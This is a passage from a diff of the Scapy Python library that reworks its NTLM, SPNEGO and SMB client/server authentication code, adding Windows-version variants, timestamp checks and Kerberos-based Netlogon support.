pkt.Size > 48, + ), ] + def post_build(self, pkt, pay): + if self.Size is None: + pkt = struct.pack(" 48) and 56 or 48) + OFFSET = lambda pkt: ( + 48 + if ( + pkt.VARIANT == NTLM_VARIANT.NT_OR_2000 + or (pkt.TargetInfoBufferOffset or 56) <= 48 + ) + else 56 + ) fields_desc = ( [ NTLM_Header, @@ -653,8 +753,11 @@ class NTLM_CHALLENGE(_NTLMPayloadPacket): ConditionalField( # (not present on some old Windows versions. We use a heuristic) x, - lambda pkt: ((pkt.TargetInfoBufferOffset or 56) > 40) - or pkt.fields.get(x.name, b""), + lambda pkt: pkt.VARIANT >= NTLM_VARIANT.XP_OR_2003 + and ( + ((pkt.TargetInfoBufferOffset or 56) > 40) + or pkt.fields.get(x.name, b"") + ), ) for x in _NTLM_Version.fields_desc ] @@ -770,14 +873,23 @@ def computeNTProofStr(self, ResponseKeyNT, ServerChallenge): return HMAC_MD5(ResponseKeyNT, ServerChallenge + temp) -class NTLM_AUTHENTICATE(_NTLMPayloadPacket): +class NTLM_AUTHENTICATE(_NTLM_VARIANT_Packet, NTLM_Header): name = "NTLM Authenticate" + __slots__ = ["VARIANT"] MessageType = 3 NTLM_VERSION = 1 OFFSET = lambda pkt: ( - ((pkt.DomainNameBufferOffset or 88) <= 64) - and 64 - or (((pkt.DomainNameBufferOffset or 88) > 72) and 88 or 72) + 64 + if ( + pkt.VARIANT == NTLM_VARIANT.NT_OR_2000 + or (pkt.DomainNameBufferOffset or 88) <= 64 + ) + else ( + 72 + if pkt.VARIANT == NTLM_VARIANT.XP_OR_2003 + or ((pkt.DomainNameBufferOffset or 88) <= 72) + else 88 + ) ) fields_desc = ( [ @@ -814,8 +926,11 @@ class NTLM_AUTHENTICATE(_NTLMPayloadPacket): ConditionalField( # (not present on some old Windows versions. We use a heuristic) x, - lambda pkt: ((pkt.DomainNameBufferOffset or 88) > 64) - or pkt.fields.get(x.name, b""), + lambda pkt: pkt.VARIANT >= NTLM_VARIANT.XP_OR_2003 + and ( + ((pkt.DomainNameBufferOffset or 88) > 64) + or pkt.fields.get(x.name, b"") + ), ) for x in _NTLM_Version.fields_desc ] @@ -824,8 +939,11 @@ class NTLM_AUTHENTICATE(_NTLMPayloadPacket): ConditionalField( # (not present on some old Windows versions. We use a heuristic) XStrFixedLenField("MIC", b"", length=16), - lambda pkt: ((pkt.DomainNameBufferOffset or 88) > 72) - or pkt.fields.get("MIC", b""), + lambda pkt: pkt.VARIANT >= NTLM_VARIANT.RECENT + and ( + ((pkt.DomainNameBufferOffset or 88) > 72) + or pkt.fields.get("MIC", b"") + ), ), # Payload _NTLMPayloadField( @@ -1190,7 +1308,6 @@ class NTLMSSP(SSP): authenticates inbound users. """ - oid = "1.3.6.1.4.1.311.2.2.10" auth_type = 0x0A class STATE(SSP.STATE): @@ -1215,6 +1332,7 @@ class CONTEXT(SSP.CONTEXT): "neg_tok", "chall_tok", "ServerHostname", + "ServerDomain", ] def __init__(self, IsAcceptor, req_flags=None): @@ -1232,6 +1350,7 @@ def __init__(self, IsAcceptor, req_flags=None): self.neg_tok = None self.chall_tok = None self.ServerHostname = None + self.ServerDomain = None self.IsAcceptor = IsAcceptor super(NTLMSSP.CONTEXT, self).__init__(req_flags=req_flags) @@ -1241,12 +1360,16 @@ def clifailure(self): def __repr__(self): return "NTLMSSP" + # [MS-NLMP] note <36>: "the maximum lifetime is 36 hours" (lol, Kerberos has 5min) + NTLM_MaxLifetime = 36 * 3600 + def __init__( self, UPN=None, HASHNT=None, PASSWORD=None, USE_MIC=True, + VARIANT: NTLM_VARIANT = NTLM_VARIANT.RECENT, NTLM_VALUES={}, DOMAIN_FQDN=None, DOMAIN_NB_NAME=None, @@ -1261,9 +1384,17 @@ def __init__( if HASHNT is None and PASSWORD is not None: HASHNT = MD4le(PASSWORD) self.HASHNT = HASHNT - self.USE_MIC = USE_MIC + self.VARIANT = VARIANT + if self.VARIANT != NTLM_VARIANT.RECENT: + log_runtime.warning( + "VARIANT != NTLM_VARIANT.RECENT. You shouldn't touch this !" + ) + self.USE_MIC = False + else: + self.USE_MIC = USE_MIC self.NTLM_VALUES = NTLM_VALUES if UPN is not None: + # Populate values used only in server mode. from scapy.layers.kerberos import _parse_upn try: @@ -1274,14 +1405,17 @@ def __init__( COMPUTER_NB_NAME = user except ValueError: pass + + # Compute various netbios/fqdn names self.DOMAIN_FQDN = DOMAIN_FQDN or "domain.local" self.DOMAIN_NB_NAME = ( DOMAIN_NB_NAME or self.DOMAIN_FQDN.split(".")[0].upper()[:15] ) - self.COMPUTER_NB_NAME = COMPUTER_NB_NAME or "SRV" + self.COMPUTER_NB_NAME = COMPUTER_NB_NAME or "WIN10" self.COMPUTER_FQDN = COMPUTER_FQDN or ( self.COMPUTER_NB_NAME.lower() + "." + self.DOMAIN_FQDN ) + self.IDENTITIES = IDENTITIES self.DO_NOT_CHECK_LOGIN = DO_NOT_CHECK_LOGIN self.SERVER_CHALLENGE = SERVER_CHALLENGE @@ -1290,6 +1424,9 @@ def __init__( def LegsAmount(self, Context: CONTEXT): return 3 + def GSS_Inquire_names_for_mech(self): + return ["1.3.6.1.4.1.311.2.2.10"] + def GSS_GetMICEx(self, Context, msgs, qop_req=0): """ [MS-NLMP] sect 3.4.8 @@ -1349,18 +1486,18 @@ def GSS_UnwrapEx(self, Context, msgs, signature): self.GSS_VerifyMICEx(Context, msgs, signature) return msgs - def canMechListMIC(self, Context): + def SupportsMechListMIC(self): if not self.USE_MIC: # RFC 4178 # "If the mechanism selected by the negotiation does not support integrity # protection, then no mechlistMIC token is used." return False - if not Context or not Context.SessionKey: - # Not available yet + if self.DO_NOT_CHECK_LOGIN: + # In this mode, we won't negotiate any credentials. return False return True - def getMechListMIC(self, Context, input): + def GetMechListMIC(self, Context, input): # [MS-SPNG] # "When NTLM is negotiated, the SPNG server MUST set OriginalHandle to # ServerHandle before generating the mechListMIC, then set ServerHandle to @@ -1368,11 +1505,11 @@ def getMechListMIC(self, Context, input): OriginalHandle = Context.SendSealHandle Context.SendSealHandle = RC4Init(Context.SendSealKey) try: - return super(NTLMSSP, self).getMechListMIC(Context, input) + return super(NTLMSSP, self).GetMechListMIC(Context, input) finally: Context.SendSealHandle = OriginalHandle - def verifyMechListMIC(self, Context, otherMIC, input): + def VerifyMechListMIC(self, Context, otherMIC, input): # [MS-SPNG] # "the SPNEGO Extension server MUST set OriginalHandle to ClientHandle before # validating the mechListMIC and then set ClientHandle to OriginalHandle after @@ -1380,14 +1517,14 @@ def verifyMechListMIC(self, Context, otherMIC, input): OriginalHandle = Context.RecvSealHandle Context.RecvSealHandle = RC4Init(Context.RecvSealKey) try: - return super(NTLMSSP, self).verifyMechListMIC(Context, otherMIC, input) + return super(NTLMSSP, self).VerifyMechListMIC(Context, otherMIC, input) finally: Context.RecvSealHandle = OriginalHandle def GSS_Init_sec_context( self, Context: CONTEXT, - token=None, + input_token=None, target_name: Optional[str] = None, req_flags: Optional[GSS_C_FLAGS] = None, chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, @@ -1399,6 +1536,7 @@ def GSS_Init_sec_context( # Client: negotiate # Create a default token tok = NTLM_NEGOTIATE( + VARIANT=self.VARIANT, NegotiateFlags="+".join( [ "NEGOTIATE_UNICODE", @@ -1408,10 +1546,14 @@ def GSS_Init_sec_context( "TARGET_TYPE_DOMAIN", "NEGOTIATE_EXTENDED_SESSIONSECURITY", "NEGOTIATE_TARGET_INFO", - "NEGOTIATE_VERSION", "NEGOTIATE_128", "NEGOTIATE_56", ] + + ( + ["NEGOTIATE_VERSION"] + if self.VARIANT >= NTLM_VARIANT.XP_OR_2003 + else [] + ) + ( [ "NEGOTIATE_KEY_EXCH", @@ -1455,54 +1597,79 @@ def GSS_Init_sec_context( return Context, tok, GSS_S_CONTINUE_NEEDED elif Context.state == self.STATE.CLI_SENT_NEGO: # Client: auth (token=challenge) - chall_tok = token + chall_tok = input_token if self.UPN is None or self.HASHNT is None: raise ValueError( "Must provide a 'UPN' and a 'HASHNT' or 'PASSWORD' when " "running in standalone !" ) + + from scapy.layers.kerberos import _parse_upn + + # Check token sanity if not chall_tok or NTLM_CHALLENGE not in chall_tok: log_runtime.debug("NTLMSSP: Unexpected token. Expected NTLM Challenge") return Context, None, GSS_S_DEFECTIVE_TOKEN - # Take a default token + + # Some information from the CHALLENGE are stored + try: + Context.ServerHostname = chall_tok.getAv(0x0001).Value + except IndexError: + pass + try: + Context.ServerDomain = chall_tok.getAv(0x0002).Value + except IndexError: + pass + try: + # the server SHOULD set the timestamp in the CHALLENGE_MESSAGE + ServerTimestamp = chall_tok.getAv(0x0007).Value + ServerTime = (ServerTimestamp / 1e7) - 11644473600 + + if abs(ServerTime - time.time()) >= NTLMSSP.NTLM_MaxLifetime: + log_runtime.warning( + "Server and Client times are off by more than 36h !" + ) + # We could error here, but we don't. + except IndexError: + pass + + # Initialize a default token tok = NTLM_AUTHENTICATE_V2( + VARIANT=self.VARIANT, NegotiateFlags=chall_tok.NegotiateFlags, ProductMajorVersion=10, ProductMinorVersion=0, ProductBuild=19041, ) tok.LmChallengeResponse = LMv2_RESPONSE() - from scapy.layers.kerberos import _parse_upn + # Populate the token + # 1. Set username try: tok.UserName, realm = _parse_upn(self.UPN) except ValueError: - tok.UserName, realm = self.UPN, None + tok.UserName, realm = self.UPN, Context.ServerDomain + + # 2. Set domain name if realm is None: - try: - tok.DomainName = chall_tok.getAv(0x0002).Value - except IndexError: - log_runtime.warning( - "No realm specified in UPN, nor provided by server" - ) - tok.DomainName = self.DOMAIN_NB_NAME.encode() + log_runtime.warning( + "No realm specified in UPN, nor provided by server." + ) + tok.DomainName = self.DOMAIN_FQDN else: tok.DomainName = realm - try: - tok.Workstation = Context.ServerHostname = chall_tok.getAv( - 0x0001 - ).Value # noqa: E501 - except IndexError: - tok.Workstation = "WIN" + + # 3. Set workstation name + tok.Workstation = self.COMPUTER_NB_NAME + + # 4. Create and calculate the ChallengeResponse + # 4.1 Build the payload cr = tok.NtChallengeResponse = NTLMv2_RESPONSE( ChallengeFromClient=os.urandom(8), ) - try: - # the server SHOULD set the timestamp in the CHALLENGE_MESSAGE - cr.TimeStamp = chall_tok.getAv(0x0007).Value - except IndexError: - cr.TimeStamp = int((time.time() + 11644473600) * 1e7) + cr.TimeStamp = int((time.time() + 11644473600) * 1e7) cr.AvPairs = ( + # Repeat AvPairs from the server chall_tok.TargetInfo[:-1] + ( [ @@ -1530,7 +1697,10 @@ def GSS_Init_sec_context( else [] ) + [ - AV_PAIR(AvId="MsvAvTargetName", Value="host/" + tok.Workstation), + AV_PAIR( + AvId="MsvAvTargetName", + Value=target_name or ("host/" + Context.ServerHostname), + ), AV_PAIR(AvId="MsvAvEOL"), ] ) @@ -1544,19 +1714,22 @@ def GSS_Init_sec_context( ]: if key in self.NTLM_VALUES: setattr(tok, key, self.NTLM_VALUES[key]) - # Compute the ResponseKeyNT + + # 4.2 Compute the ResponseKeyNT ResponseKeyNT = NTOWFv2( None, tok.UserName, tok.DomainName, HashNt=self.HASHNT, ) - # Compute the NTProofStr + + # 4.3 Compute the NTProofStr cr.NTProofStr = cr.computeNTProofStr( ResponseKeyNT, chall_tok.ServerChallenge, ) - # Compute the Session Key + + # 4.4 Compute the Session Key SessionBaseKey = NTLMv2_ComputeSessionBaseKey(ResponseKeyNT, cr.NTProofStr) KeyExchangeKey = SessionBaseKey # Only true for NTLMv2 if chall_tok.NegotiateFlags.NEGOTIATE_KEY_EXCH: @@ -1567,8 +1740,12 @@ def GSS_Init_sec_context( ) else: ExportedSessionKey = KeyExchangeKey + + # 4.5 Compute the MIC if self.USE_MIC: tok.compute_mic(ExportedSessionKey, Context.neg_tok, chall_tok) + + # 5. Perform key computations Context.ExportedSessionKey = ExportedSessionKey # [MS-SMB] 3.2.5.3 Context.SessionKey = Context.ExportedSessionKey @@ -1587,12 +1764,15 @@ def GSS_Init_sec_context( tok.NegotiateFlags, ExportedSessionKey, "Server" ) Context.RecvSealHandle = RC4Init(Context.RecvSealKey) + + # Update the state Context.state = self.STATE.CLI_SENT_AUTH + return Context, tok, GSS_S_COMPLETE elif Context.state == self.STATE.CLI_SENT_AUTH: - if token: + if input_token: # what is that? - status = GSS_S_DEFECTIVE_CREDENTIAL + status = GSS_S_DEFECTIVE_TOKEN else: status = GSS_S_COMPLETE return Context, None, status @@ -1602,7 +1782,7 @@ def GSS_Init_sec_context( def GSS_Accept_sec_context( self, Context: CONTEXT, - token=None, + input_token=None, req_flags: Optional[GSS_S_FLAGS] = GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS, chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, ): @@ -1610,14 +1790,16 @@ def GSS_Accept_sec_context( Context = self.CONTEXT(IsAcceptor=True, req_flags=req_flags) if Context.state == self.STATE.INIT: - # Server: challenge (token=negotiate) - nego_tok = token + # Server: challenge (input_token=negotiate) + nego_tok = input_token if not nego_tok or NTLM_NEGOTIATE not in nego_tok: log_runtime.debug("NTLMSSP: Unexpected token. Expected NTLM Negotiate") return Context, None, GSS_S_DEFECTIVE_TOKEN - # Take a default token + + # Build the challenge token currentTime = (time.time() + 11644473600) * 1e7 tok = NTLM_CHALLENGE( + VARIANT=self.VARIANT, ServerChallenge=self.SERVER_CHALLENGE or os.urandom(8), NegotiateFlags="+".join( [ @@ -1628,11 +1810,15 @@ def GSS_Accept_sec_context( "NEGOTIATE_EXTENDED_SESSIONSECURITY", "NEGOTIATE_TARGET_INFO", "TARGET_TYPE_DOMAIN", - "NEGOTIATE_VERSION", "NEGOTIATE_128", "NEGOTIATE_KEY_EXCH", "NEGOTIATE_56", ] + + ( + ["NEGOTIATE_VERSION"] + if self.VARIANT >= NTLM_VARIANT.XP_OR_2003 + else [] + ) + ( ["NEGOTIATE_SIGN"] if nego_tok.NegotiateFlags.NEGOTIATE_SIGN @@ -1696,12 +1882,17 @@ def GSS_Accept_sec_context( if ((x in self.NTLM_VALUES) or (i in avpairs)) and self.NTLM_VALUES.get(x, True) is not None ] + + # Store for next step Context.chall_tok = tok + + # Update the state Context.state = self.STATE.SRV_SENT_CHAL + return Context, tok, GSS_S_CONTINUE_NEEDED elif Context.state == self.STATE.SRV_SENT_CHAL: - # server: OK or challenge again (token=auth) - auth_tok = token + # server: OK or challenge again (input_token=auth) + auth_tok = input_token if not auth_tok or NTLM_AUTHENTICATE_V2 not in auth_tok: log_runtime.debug( @@ -1710,7 +1901,7 @@ def GSS_Accept_sec_context( return Context, None, GSS_S_DEFECTIVE_TOKEN if self.DO_NOT_CHECK_LOGIN: - # Just trust me bro + # Just trust me bro. Typically used in "guest" mode. return Context, None, GSS_S_COMPLETE # Compute the session key @@ -1719,12 +1910,12 @@ def GSS_Accept_sec_context( # [MS-NLMP] sect 3.2.5.1.2 KeyExchangeKey = SessionBaseKey # Only true for NTLMv2 if auth_tok.NegotiateFlags.NEGOTIATE_KEY_EXCH: - if not auth_tok.EncryptedRandomSessionKeyLen: + try: + EncryptedRandomSessionKey = auth_tok.EncryptedRandomSessionKey + except AttributeError: # No EncryptedRandomSessionKey. libcurl for instance # hmm. this looks bad EncryptedRandomSessionKey = b"\x00" * 16 - else: - EncryptedRandomSessionKey = auth_tok.EncryptedRandomSessionKey ExportedSessionKey = RC4K(KeyExchangeKey, EncryptedRandomSessionKey) else: ExportedSessionKey = KeyExchangeKey @@ -1732,6 +1923,19 @@ def GSS_Accept_sec_context( # [MS-SMB] 3.2.5.3 Context.SessionKey = Context.ExportedSessionKey + # Check the timestamp + try: + ClientTimestamp = auth_tok.NtChallengeResponse.getAv(0x0007).Value + ClientTime = (ClientTimestamp / 1e7) - 11644473600 + + if abs(ClientTime - time.time()) >= NTLMSSP.NTLM_MaxLifetime: + log_runtime.warning( + "Server and Client times are off by more than 36h !" + ) + # We could error here, but we don't. + except IndexError: + pass + # Check the channel bindings if chan_bindings != GSS_C_NO_CHANNEL_BINDINGS: try: @@ -1744,7 +1948,6 @@ def GSS_Accept_sec_context( # Uhoh, we required channel bindings return Context, None, GSS_S_BAD_BINDINGS - # Check the NTProofStr if Context.SessionKey: # Compute NTLM keys Context.SendSignKey = SIGNKEY( @@ -1761,6 +1964,8 @@ def GSS_Accept_sec_context( auth_tok.NegotiateFlags, ExportedSessionKey, "Client" ) Context.RecvSealHandle = RC4Init(Context.RecvSealKey) + + # Check the NTProofStr if self._checkLogin(Context, auth_tok): # Set negotiated flags if auth_tok.NegotiateFlags.NEGOTIATE_SIGN: @@ -1842,20 +2047,24 @@ def _getSessionBaseKey(self, Context, auth_tok): """ Function that returns the SessionBaseKey from the ntlm Authenticate. """ - if auth_tok.UserNameLen: + try: username = auth_tok.UserName - else: + except AttributeError: username = None - if auth_tok.DomainNameLen: + try: domain = auth_tok.DomainName - else: + except AttributeError: domain = "" if self.IDENTITIES and username in self.IDENTITIES: ResponseKeyNT = NTOWFv2( - None, username, domain, HashNt=self.IDENTITIES[username] + None, + username, + domain, + HashNt=self.IDENTITIES[username], ) return NTLMv2_ComputeSessionBaseKey( - ResponseKeyNT, auth_tok.NtChallengeResponse.NTProofStr + ResponseKeyNT, + auth_tok.NtChallengeResponse.NTProofStr, ) elif self.IDENTITIES: log_runtime.debug("NTLMSSP: Bad credentials for %s" % username) @@ -1868,17 +2077,20 @@ def _checkLogin(self, Context, auth_tok): Overwrite and return True to bypass. """ # Create the NTLM AUTH - if auth_tok.UserNameLen: + try: username = auth_tok.UserName - else: + except AttributeError: username = None - if auth_tok.DomainNameLen: + try: domain = auth_tok.DomainName - else: + except AttributeError: domain = "" if username in self.IDENTITIES: ResponseKeyNT = NTOWFv2( - None, username, domain, HashNt=self.IDENTITIES[username] + None, + username, + domain, + HashNt=self.IDENTITIES[username], ) NTProofStr = auth_tok.NtChallengeResponse.computeNTProofStr( ResponseKeyNT, @@ -1898,26 +2110,41 @@ class NTLMSSP_DOMAIN(NTLMSSP): mode: :param UPN: the UPN of the machine account to login for Netlogon. - :param HASHNT: the HASHNT of the machine account to use for Netlogon. - :param PASSWORD: the PASSWORD of the machine acconut to use for Netlogon. + :param HASHNT: the HASHNT of the machine account (use Netlogon secure channel). + :param ssp: a KerberosSSP to use (use Kerberos secure channel). + :param PASSWORD: the PASSWORD of the machine account to use for Netlogon. :param DC_IP: (optional) specify the IP of the DC. - Examples:: + Netlogon example:: >>> mySSP = NTLMSSP_DOMAIN( ... UPN="Server1@domain.local", ... HASHNT=bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c"), ... ) + + Kerberos example:: + + >>> mySSP = NTLMSSP_DOMAIN( + ... UPN="Server1@domain.local", + ... KEY=Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, + ... key=bytes.fromhex( + ... "85abb9b61dc2fa49d4cc04317bbd108f8f79df28" + ... "239155ed7b144c5d2ebcf016" + ... ) + ... ), + ... ) """ - def __init__(self, UPN, *args, timeout=3, ssp=None, **kwargs): + def __init__(self, UPN=None, *args, timeout=3, ssp=None, **kwargs): from scapy.layers.kerberos import KerberosSSP - # UPN is mandatory - kwargs["UPN"] = UPN - # Either PASSWORD or HASHNT or ssp - if "HASHNT" not in kwargs and "PASSWORD" not in kwargs and ssp is None: + if ( + "HASHNT" not in kwargs + and "PASSWORD" not in kwargs + and "KEY" not in kwargs + and ssp is None + ): raise ValueError( "Must specify either 'HASHNT', 'PASSWORD' or " "provide a ssp=KerberosSSP()" @@ -1925,6 +2152,16 @@ def __init__(self, UPN, *args, timeout=3, ssp=None, **kwargs): elif ssp is not None and not isinstance(ssp, KerberosSSP): raise ValueError("'ssp' can only be None or a KerberosSSP !") + self.KEY = kwargs.pop("KEY", None) + self.PASSWORD = kwargs.get("PASSWORD", None) + + # UPN is mandatory + if UPN is None and ssp is not None and ssp.UPN: + UPN = ssp.UPN + elif UPN is None: + raise ValueError("Must specify a 'UPN' !") + kwargs["UPN"] = UPN + # Call parent super(NTLMSSP_DOMAIN, self).__init__( *args, @@ -1932,16 +2169,17 @@ def __init__(self, UPN, *args, timeout=3, ssp=None, **kwargs): ) # Treat specific parameters - self.DC_IP = kwargs.pop("DC_IP", None) - if self.DC_IP is None: - # Get DC_IP from dclocator + self.DC_FQDN = kwargs.pop("DC_FQDN", None) + if self.DC_FQDN is None: + # Get DC_FQDN from dclocator from scapy.layers.ldap import dclocator - self.DC_IP = dclocator( + dc = dclocator( self.DOMAIN_FQDN, timeout=timeout, debug=kwargs.get("debug", 0), - ).ip + ) + self.DC_FQDN = dc.samlogon.DnsHostName.decode().rstrip(".") # If logging in via Kerberos self.ssp = ssp @@ -1957,37 +2195,41 @@ def _getSessionBaseKey(self, Context, ntlm): # Import RPC stuff from scapy.layers.dcerpc import NDRUnion from scapy.layers.msrpce.msnrpc import ( - NetlogonClient, NETLOGON_SECURE_CHANNEL_METHOD, + NetlogonClient, ) from scapy.layers.msrpce.raw.ms_nrpc import ( + NETLOGON_LOGON_IDENTITY_INFO, NetrLogonSamLogonWithFlags_Request, - PNETLOGON_NETWORK_INFO, PNETLOGON_AUTHENTICATOR, - NETLOGON_LOGON_IDENTITY_INFO, - UNICODE_STRING, + PNETLOGON_NETWORK_INFO, STRING, + UNICODE_STRING, ) # Create NetlogonClient with PRIVACY client = NetlogonClient() - client.connect_and_bind(self.DC_IP) + client.connect(self.DC_FQDN) # Establish the Netlogon secure channel (this will bind) try: - if self.ssp is None: + if self.ssp is None and self.KEY is None: # Login via classic NetlogonSSP client.establish_secure_channel( mode=NETLOGON_SECURE_CHANNEL_METHOD.NetrServerAuthenticate3, - computername=self.COMPUTER_NB_NAME, - domainname=self.DOMAIN_NB_NAME, - HashNt=self.HASHNT, + UPN=f"{self.COMPUTER_NB_NAME}@{self.DOMAIN_NB_NAME}", + DC_FQDN=self.DC_FQDN, + HASHNT=self.HASHNT, ) else: # Login via KerberosSSP (Windows 2025) - # TODO client.establish_secure_channel( mode=NETLOGON_SECURE_CHANNEL_METHOD.NetrServerAuthenticateKerberos, + UPN=self.UPN, + DC_FQDN=self.DC_FQDN, + PASSWORD=self.PASSWORD, + KEY=self.KEY, + ssp=self.ssp, ) except ValueError: log_runtime.warning( diff --git a/scapy/layers/smb.py b/scapy/layers/smb.py index 676021e1d6b..541ab10c292 100644 --- a/scapy/layers/smb.py +++ b/scapy/layers/smb.py @@ -1001,10 +1001,11 @@ class NETLOGON_SAM_LOGON_RESPONSE_NT40(NETLOGON): 0x00000800: "SELECT_SECRET_DOMAIN_6", 0x00001000: "FULL_SECRET_DOMAIN_6", 0x00002000: "WS", - 0x00004000: "DS_8", - 0x00008000: "DS_9", - 0x00010000: "DS_10", # guess - 0x00020000: "DS_11", # guess + 0x00004000: "DS_8", # >=2008R2 + 0x00008000: "DS_9", # >=2012 + 0x00010000: "DS_10", # >=2016 + 0x00020000: "DS_11", # >=2019 + 0x00040000: "DS_12", # >=2025 0x20000000: "DNS_CONTROLLER", 0x40000000: "DNS_DOMAIN", 0x80000000: "DNS_FOREST", diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 7d17e828375..3b4e650c9d7 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -4717,6 +4717,7 @@ def recv(self, x=None): pkt = self.queue.popleft() else: pkt = super(SMBStreamSocket, self).recv(x) + # If there are multiple SMB2_Header requests (aka. compounded), # take the first and store the rest in a queue. if pkt is not None and ( @@ -4725,14 +4726,17 @@ def recv(self, x=None): or SMB2_Compression_Transform_Header in pkt ): pkt = self.session.in_pkt(pkt) - pay = pkt[SMB2_Header].payload + smbh = pkt[SMB2_Header] + pay = smbh.payload while SMB2_Header in pay: pay = pay[SMB2_Header] + pay._decrypted = smbh._decrypted # Keep the _decrypted flag pay.underlayer.remove_payload() self.queue.append(pay) if not pay.NextCommand: break pay = pay.payload + # Verify the signature if required. # This happens here because we must have split compounded requests first. smbh = pkt.getlayer(SMB2_Header) diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index 360acbce824..68bdc30d4c8 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -447,7 +447,7 @@ def NEGOTIATED(self, ssp_blob=None): # Begin session establishment ssp_tuple = self.session.ssp.GSS_Init_sec_context( self.session.sspcontext, - token=ssp_blob, + input_token=ssp_blob, target_name="cifs/" + self.HOST if self.HOST else None, req_flags=( GSS_C_FLAGS.GSS_C_MUTUAL_FLAG @@ -476,8 +476,8 @@ def update_smbheader(self, pkt): @ATMT.condition(NEGOTIATED, prio=1) def should_send_session_setup_request(self, ssp_tuple): - _, _, negResult = ssp_tuple - if negResult not in [GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED]: + _, _, status = ssp_tuple + if status not in [GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED]: raise ValueError("Internal error: the SSP completed with an error.") raise self.SENT_SESSION_REQUEST().action_parameters(ssp_tuple) @@ -487,8 +487,8 @@ def SENT_SESSION_REQUEST(self): @ATMT.action(should_send_session_setup_request) def send_setup_session_request(self, ssp_tuple): - self.session.sspcontext, token, negResult = ssp_tuple - if self.SMB2 and negResult == GSS_S_CONTINUE_NEEDED: + self.session.sspcontext, token, status = ssp_tuple + if self.SMB2 and status == GSS_S_CONTINUE_NEEDED: # New session: force 0 self.SessionId = 0 if self.SMB2 or self.EXTENDED_SECURITY: @@ -608,7 +608,7 @@ def AUTH_FAILED(self): def AUTHENTICATED(self, ssp_blob=None): self.session.sspcontext, _, status = self.session.ssp.GSS_Init_sec_context( self.session.sspcontext, - token=ssp_blob, + input_token=ssp_blob, target_name="cifs/" + self.HOST if self.HOST else None, ) if status != GSS_S_COMPLETE: @@ -1123,7 +1123,7 @@ def __init__( HashAes256Sha96: bytes = None, HashAes128Sha96: bytes = None, port: int = 445, - timeout: int = 2, + timeout: int = 5, debug: int = 0, ssp=None, ST=None, diff --git a/scapy/layers/smbserver.py b/scapy/layers/smbserver.py index ff20151c7bd..be1c68ee247 100644 --- a/scapy/layers/smbserver.py +++ b/scapy/layers/smbserver.py @@ -662,7 +662,8 @@ def RECEIVED_SETUP_ANDX_REQUEST(self): @ATMT.action(receive_setup_andx_request) def on_setup_andx_request(self, pkt, ssp_blob): self.session.sspcontext, tok, status = self.session.ssp.GSS_Accept_sec_context( - self.session.sspcontext, ssp_blob + self.session.sspcontext, + ssp_blob, ) self.update_smbheader(pkt) if SMB2_Session_Setup_Request in pkt: diff --git a/scapy/layers/spnego.py b/scapy/layers/spnego.py index 3afb73268ed..a37091313b3 100644 --- a/scapy/layers/spnego.py +++ b/scapy/layers/spnego.py @@ -16,13 +16,14 @@ `GSSAPI `_ """ +import os import struct from uuid import UUID from scapy.asn1.asn1 import ( - ASN1_OID, - ASN1_STRING, ASN1_Codecs, + ASN1_OID, + ASN1_GENERAL_STRING, ) from scapy.asn1.mib import conf # loads conf.mib from scapy.asn1fields import ( @@ -31,14 +32,14 @@ ASN1F_FLAGS, ASN1F_GENERAL_STRING, ASN1F_OID, + ASN1F_optional, ASN1F_PACKET, - ASN1F_SEQUENCE, ASN1F_SEQUENCE_OF, + ASN1F_SEQUENCE, + ASN1F_STRING_ENCAPS, ASN1F_STRING, - ASN1F_optional, ) from scapy.asn1packet import ASN1_Packet -from scapy.base_classes import Net from scapy.fields import ( FieldListField, LEIntEnumField, @@ -56,32 +57,34 @@ XStrFixedLenField, XStrLenField, ) +from scapy.error import log_runtime from scapy.packet import Packet, bind_layers from scapy.utils import ( valid_ip, valid_ip6, ) -from scapy.layers.inet6 import Net6 from scapy.layers.gssapi import ( - GSSAPI_BLOB, - GSSAPI_BLOB_SIGNATURE, + _GSSAPI_OIDS, + _GSSAPI_SIGNATURE_OIDS, GSS_C_FLAGS, GSS_C_NO_CHANNEL_BINDINGS, GSS_S_BAD_MECH, GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED, + GSS_S_FAILURE, GSS_S_FLAGS, + GSSAPI_BLOB_SIGNATURE, + GSSAPI_BLOB, GssChannelBindings, SSP, - _GSSAPI_OIDS, - _GSSAPI_SIGNATURE_OIDS, ) # SSP Providers from scapy.layers.kerberos import ( Kerberos, KerberosSSP, + _parse_spn, _parse_upn, ) from scapy.layers.ntlm import ( @@ -96,6 +99,7 @@ # Typing imports from typing import ( Dict, + List, Optional, Tuple, ) @@ -116,13 +120,14 @@ class SPNEGO_MechTypes(ASN1_Packet): class SPNEGO_MechListMIC(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_STRING("value", "") + ASN1_root = ASN1F_STRING_ENCAPS("value", "", GSSAPI_BLOB_SIGNATURE) _mechDissector = { "1.3.6.1.4.1.311.2.2.10": NTLM_Header, # NTLM "1.2.840.48018.1.2.2": Kerberos, # MS KRB5 - Microsoft Kerberos 5 "1.2.840.113554.1.2.2": Kerberos, # Kerberos 5 + "1.2.840.113554.1.2.2.3": Kerberos, # Kerberos 5 - User to User } @@ -134,13 +139,16 @@ def i2m(self, pkt, x): def m2i(self, pkt, s): dat, r = super(_SPNEGO_Token_Field, self).m2i(pkt, s) + types = None if isinstance(pkt.underlayer, SPNEGO_negTokenInit): types = pkt.underlayer.mechTypes elif isinstance(pkt.underlayer, SPNEGO_negTokenResp): types = [pkt.underlayer.supportedMech] if types and types[0] and types[0].oid.val in _mechDissector: return _mechDissector[types[0].oid.val](dat.val), r - return dat, r + else: + # Use heuristics + return GSSAPI_BLOB(dat.val), r class SPNEGO_Token(ASN1_Packet): @@ -208,7 +216,7 @@ class SPNEGO_negTokenResp(ASN1_Packet): ASN1_root = ASN1F_SEQUENCE( ASN1F_optional( ASN1F_ENUMERATED( - "negResult", + "negState", 0, { 0: "accept-completed", @@ -262,6 +270,17 @@ class 